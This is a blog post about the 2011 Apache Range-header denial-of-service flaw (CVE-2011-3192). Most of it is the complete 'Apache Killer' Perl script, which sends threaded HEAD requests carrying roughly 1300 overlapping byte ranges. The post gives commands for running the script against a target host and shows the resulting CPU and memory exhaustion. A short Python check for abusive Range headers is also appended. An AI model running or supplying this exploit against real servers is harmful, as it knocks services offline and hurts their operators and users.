APACHE DoS Vulnerability (CVE-2011-3192)

Just for information (many may already know this): there is a vulnerability in Apache HTTP Server 1.3.x and 2.x.x up to 2.2.19.

In the mitre.org vulnerability database, the vulnerability is named CVE-2011-3192; for full details, click here

This vulnerability exploits a weakness in how Apache httpd handles Range requests, exhausting the server's processor and memory.

Apache.org has patched this vulnerability by releasing the new version 2.2.20 on 31 August 2011.

Below is the script from Pastebin (sorry, I forgot to copy the link, just use your google-fu),
called Apache Killer:


#!/usr/bin/perl

#Apache httpd Remote Denial of Service (CPU  & memory exhaustion)
#Original by Kingcope
#Altered by W
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use threads;

sub usage
{
print "Apache Remote Denial of Service (CPU & memory exhaustion)\n";
print "Originally by Kingcope\n";
print "Altered to use threads by W\n";
print "Usage: $0 [page=/] [threads=50]\n";
print "Example: $0 YES www.example.com index.html 50\n";
print "If attack is anything other than 'YES', then the tool will test and exit.\n";
}

sub testapache
{
print "Testing for partial content exploit against $host$path...\n";

my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto    => 'tcp') or die "Can't open socket to $host!\n";

my $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

my $x = <$sock>;
if ($x =~ /Partial/)
{
print "Host: $host appears to be vulnerable to partial content DoS\n";
return 1;
} else {
print "Host: $host appears to not be vulnerable, returned:\n$x";
return 0;
}
}

sub exploitserver
{
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto    => 'tcp') or return(0);
print $sock $p;

while(<$sock>)
{
}
print ".";
}

if($#ARGV < 1)
{
&usage && exit;
}

$real = ($ARGV[0] eq 'YES');
$host = $ARGV[1];
$path = ($#ARGV > 1) ? '/' . $ARGV[2] : '/';
$numthreads = ($#ARGV > 2) ? $ARGV[3] : 50;
$vuln = &testapache;

srand(time());
my $r = "";

for ($k=0;$k<1300;$k++) {
$r .= ",5-$k";
}

$p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
if($vuln && $real)
{
my @threads;
$|=1;

print "Running partial content exploit against $host$path using $numthreads threads\n";
for(my $n = 0; $n < $numthreads; $n++)
{
my $thr = async { while(1){ &exploitserver; } };
push(@threads, $thr);
}
foreach(@threads)
{
$_->join();
print($_);
}
}


The script above is used as follows:
1. to find out whether the Apache web server is vulnerable or not
#perl filename.pl www.target.com

2. to carry out the exploitation
#perl filename.pl YES www.target.com

Here is what I tried on localhost BT5 with Apache version 2.2.14:

and the result was as follows:

Look at Cpu(s): 92.5%us and Mem: 3094072k total, 2748296k used, 345776k free; also look at the Apache2 services with different PIDs listed below them.

Our processor and RAM are made to work at their maximum, which will certainly cause the server to go out of service…

So update your Apache server right away :)
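As an added example (not part of the original post or the Pastebin script), the following Python check parses a Range header value and flags the shape the script builds: far more ranges than a normal client sends, most of them overlapping. The 5-range threshold, the function names and the sample headers are assumptions made for illustration.

```python
import re

MAX_RANGES = 5  # assumed policy threshold, not taken from the post
_SPEC = re.compile(r"^(\d*)-(\d*)$")

def parse_range(value):
    """Return (ranges, invalid): ranges are (first, last), None = open end."""
    unit, _, spec_set = value.partition("=")
    if unit.strip().lower() != "bytes":
        return [], 0
    ranges, invalid = [], 0
    for spec in spec_set.split(","):
        m = _SPEC.match(spec.strip())
        if not m or not (m.group(1) or m.group(2)):
            invalid += 1
            continue
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else None
        if first is not None and last is not None and last < first:
            invalid += 1  # e.g. "5-0": last byte precedes first byte
            continue
        ranges.append((first, last))
    return ranges, invalid

def count_overlaps(ranges):
    """Count absolute ranges that begin inside an earlier one."""
    spans = sorted((f, float("inf") if l is None else l)
                   for f, l in ranges if f is not None)
    overlaps, reach = 0, -1
    for first, last in spans:
        if first <= reach:
            overlaps += 1
        reach = max(reach, last)
    return overlaps

def assess_range_header(value, max_ranges=MAX_RANGES):
    """Summarise one Range header value and flag the abusive shape."""
    ranges, invalid = parse_range(value)
    total, overlaps = len(ranges) + invalid, count_overlaps(ranges)
    return {"total": total, "invalid": invalid, "overlaps": overlaps,
            "suspicious": total > max_ranges or overlaps > 0}

# Constructed samples: one ordinary request, and one with the
# many-overlapping-ranges shape of the header the script on this page builds.
NORMAL = "bytes=0-99,200-299,-500"
FLOOD = "bytes=0-5" + "".join(",5-%d" % k for k in range(1300))

if __name__ == "__main__":
    for name, hdr in (("normal", NORMAL), ("flood", FLOOD)):
        print(name, assess_range_header(hdr))
```

The same function can be run over Range values pulled from request logs or applied in a reverse proxy in front of servers that cannot be upgraded yet.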

Hope this is useful

Source: ikonspirasi.com
